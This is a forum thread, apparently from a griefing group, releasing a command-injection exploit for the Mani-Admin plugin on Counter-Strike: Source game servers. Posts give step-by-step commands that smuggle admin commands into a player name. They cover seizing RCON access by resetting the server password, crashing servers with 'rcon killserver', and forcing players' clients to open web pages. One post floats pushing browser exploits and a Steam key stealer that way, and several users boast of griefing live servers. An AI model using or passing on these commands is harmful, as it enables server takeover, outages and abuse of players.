We had originally authorized BaDazz to release this on the MPC forums, but since Diddle viewed it as potential legal trouble, we are posting it here instead. The details of our original post are as follows:

 

This has been a semi-private exploit for some time now, and since many servers have been putting fixes in place for it, we at myg0t have decided to release it to the general public.

 

The exploit takes place in the Mani-Admin plugin console, which works on all (but patched) CSP, Euroblock, ZBlock, and Cvarblock servers, and it enables you to more or less play admin on the server of choice. You may find a short MPEG encoded movie of the exploit being used here: **REMOVED AS THIS WAS FIXED**

 

Follow these steps to test out this exploit:

 

Step 1. Start CS:S with or without hacks.. doesnt really matter.

Step 2. Open the console and use a command such as: name "myg0t;ma_cexec_all name [myg0t]"

Step 3. After that, connect to an IP of the server you want. (see below)

Step 4. Join a team and select your player model. The command will be executed when the new round starts.

 

So, at the start of the next round, all player names will be changed with [myg0t] and part of their SteamID.

For step two, you have many commands to choose from, here are some fun ones for an exmaple:

 

name "myg0t;ma_freeze #CT" < or #T for terror team.. or #ALL for all players. freeze ppl

name "myg0t;sv_gravity 1"

name "myg0t;sv_cheats 1"

name "myg0t;ma_blind #CT" < or #T for terror team.. or #ALL for all players. blinding ppl

name "myg0t;ma_timebomb #all" < or #T for terror team.. or #ALL for all players. make ppl a timebomb

name "myg0t;ma_cexec_all fps max 0.99"

 

You can use your imagination and do almost anything you'd like, turn VAC2 secure servers into insecure, enable wireframe, wallhacks, hitboxes and more.

 

To spam things like skulls and purple shit like in past CS:S beta exploits, first enable sv_cheats, and then use the following config file:

 

"te 1000 breakmodel"

"te 1000 Dynamic Light"

"te 1000 Explosion"

"te 1000 Large Funnel"

"te 1000 Show Line"

"te 1000 Blood Stream"

"te 1000 Metal Sparks"

"te 1000 Armor Ricochet"

"te 1000 BeamRingPoint"

"te 1000 Bubbles"

"te 1000 Sprite"

"te 1000 Energy Splash"

"te 1000 Smoke"

"te 1000 breakmodel"

"te 1000 Dynamic Light"

"te 1000 Explosion"

"te 1000 Large Funnel"

"te 1000 Show Line"

"te 1000 Blood Stream"

"te 1000 Metal Sparks"

"te 1000 Armor Ricochet"

"te 1000 BeamRingPoint"

"te 1000 Bubbles"

"te 1000 Sprite"

"te 1000 Energy Splash"

"te 1000 Smoke"

 

This exploit has been tested in CS:S and DoD:S. Credits go out to daad from our forums for finding this and sharing it with us.

To find a list of all CVARblock servers:

 

http://www.game-monitor.com/search.php?search=cvarblock_version=&type=variable

good times with this exploit

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

____________

To find Zblock servers, look here: http://www.game-monitor.com/search.php?search=zblock&type=server

my favs are these:

 

name "name;ma_givehealth name 9999"

(note: replace nimrod with your name; your hud dispays the hp wrong)

 

name "name;ma_cexec_all unbindall"

(note: enter "alias unbindall" first (w/o brackets), thus u are immune to the command; if this fails and even you execute the command, bring down the console (ESC key) and enter "exec config.cfg" (w/o brackets))

 

name "name;ma_akick_pname ["

(note: sets the string [ (in a name) to auto kick list, this way you auto kick clan members from their own server (cept if they are on immune list))

 

edit: on many servers you need to join with a malicious name, disconnect, rename and rejoin - to execute a second command. on some servers though, you can rename ingame (watch our for rename-to-quickly-too-often-penalty) and say "rank" (w/o brackets) to make the plugin execute your command.

am i doing it wrong?

1. Start CSS

2. name "frate;sv_gravity 1"

3. connect 213.230.206.100:27015

4. wait until new round

5. nothing happens

A little addition to the thread:

 

How to take over a server completely

 

Taking over servers completely is also possible with this exploit, follow these steps:

Open up console, enter this: name ";rcon_password ***;sv_cheats 1"

sv_cheats 1 enables you to change the rcon_password through your name.

Now, join a server and wait for about ~10 secs. Enter this into console: rcon_password *** (and rcon rcon_password ***).

Test it by entering this into console: "rcon say hi"

Now you can execute ALL possible mani commands into console, just like normal admins do, with the RCON command placed before the ma_<yourcommand>

 

Example: rcon ma_freezebomb #all

Another example: rcon ma_cexec_all name "i g0t rwned by myg0t.com"

 

And you can do all the non mani commands, like: rcon killserver.. etc.

Killing the server means you will completely fuck up the server, because the server cannot be acces thru FTP, it can only be turned on manually by your provider.

 

I hope this helped you =)

 

Edit 2

Here are some screenshots:

 

http://img214.imageshack.us/img214/2376/rifkzzz5fv.png

http://img20.imageshack.us/img20/838/rifk15yj.png

http://img87.imageshack.us/img87/8775/haiz5wz.png

 

http://img20.imageshack.us/img20/2252/owned8qj.png

If i get this to work with me, i will do "name Frate;rcon_password myg0t" on all servers i can find.

EDIT : I got +b on irc 4 days ago for being CLOSE to the answer. (temporary)

  Frate92 said:

am i doing it wrong?

1. Start CSS

2. name "frate;sv_gravity 1"

3. connect 213.230.206.100:27015

4. wait until new round

5. nothing happens

 

i think u have to enable sv_cheats first.

try it with sv_cheats 1, then with sv_gravity.

 

another solution is that

name "frate;sv_gravity 1"

doesnt work, try

name "name;sv_gravity 1"

 

btw, not the new round makes the plugin execute your name, but the check for your cvar block! this may take more than 1 round (eg if its a short one).

  Frate92 said:

If i get this to work with me, i will do "name Frate;rcon_password myg0t" on all servers i can find.

 

some plugins are already patched against this.

  Quote

nimrod']some plugins are already patched against this.

seems so, haven't found a single server working yet =(

when i actually find a decent exploit, it gets patched quickly:madkeke:

hm, this worked for me with a joke page, like "HEY EVERYBODY IM LOOKING AT GAY PORNO".

 

you open a webpage in all browsers! i only know how to do this with mani plugin though.

 

imagine u open a webpage which uses cpl of sploits for ie, to install s.p.0.r.k.3.h ^^ - or install sx steam key grabber, yay!

  Quote

nimrod']

 

imagine u open a webpage which uses cpl of sploits for ie, to install s.p.0.r.k.3.h ^^ - or install sx steam key grabber, yay!

 

rifk u give me ideas sir.ty <3

@daad

Do you know any other 'useful' commands other than the 'rcon killserver' command?

 

Does anyone know the commands that would do 'slow hack' like in 1.6?

  r4g3dSkillz said:

@daad

Do you know any other 'useful' commands other than the 'rcon killserver' command?

 

Does anyone know the commands that would do 'slow hack' like in 1.6?

 

Umm, you can do a lot more than that, changing the name of the server was one of them.. I dont know how to change it, think it was rcon name_server <hi> or sth.

 

One of the funniest commands is: rcon ma_cexec_all say @browse "www.gabenewell.com"

Thanks for posting that browse command.

 

To change the server name:

rcon hostname "owned by myg0t"

Hmmm..I didnt understand...are you going to release it soon or have you released it, if so where do i download?

Or is this and tutorial how to hack...im noob!

  Dj 6230 said:

Hmmm..I didnt understand...are you going to release it soon or have you released it, if so where do i download?

Or is this and tutorial how to hack...im noob!

its a tut ...

yeah i understanded....but how the hell..wheni wrote another name instead og mygot...it said mygot in console...why did it appear when i didnt write myg0t??

 

 

 

And i cant get it to work...

 

When i type it in console it says:

 

] myg0t;ma_cexec_all name [myg0t]

Unknown command "myg0t"

Unknown command "ma_cexec_all"

LOL this shit is soo funny :D... Just owned a 42 man dust2 server... funny shit cant believe u found something like this out :/

  Dj 6230 said:

yeah i understanded....but how the hell..wheni wrote another name instead og mygot...it said mygot in console...why did it appear when i didnt write myg0t??

 

 

 

And i cant get it to work...

 

When i type it in console it says:

 

] myg0t;ma_cexec_all name [myg0t]

Unknown command "myg0t"

Unknown command "ma_cexec_all"

 

 

I need help fast....plz plz plz plz!!!!!

LOL got it to work, so much ownage

@Dj 6230

You typed exactly this into the console?

 

name "myg0t;ma_cexec_all name [myg0t]"

 

That's it, it should work...

  r4g3dSkillz said:

@Dj 6230

You typed exactly this into the console?

 

name "myg0t;ma_cexec_all name [myg0t]"

 

That's it, it should work...

 

Can I type this:

name "retard;ma_cexec_all name [retard]"

 

instead?

And use:

name "retard;sv_gravity 1"

 

?????

Do you need to leave the game everytime to enter a new one or can you stay in the game?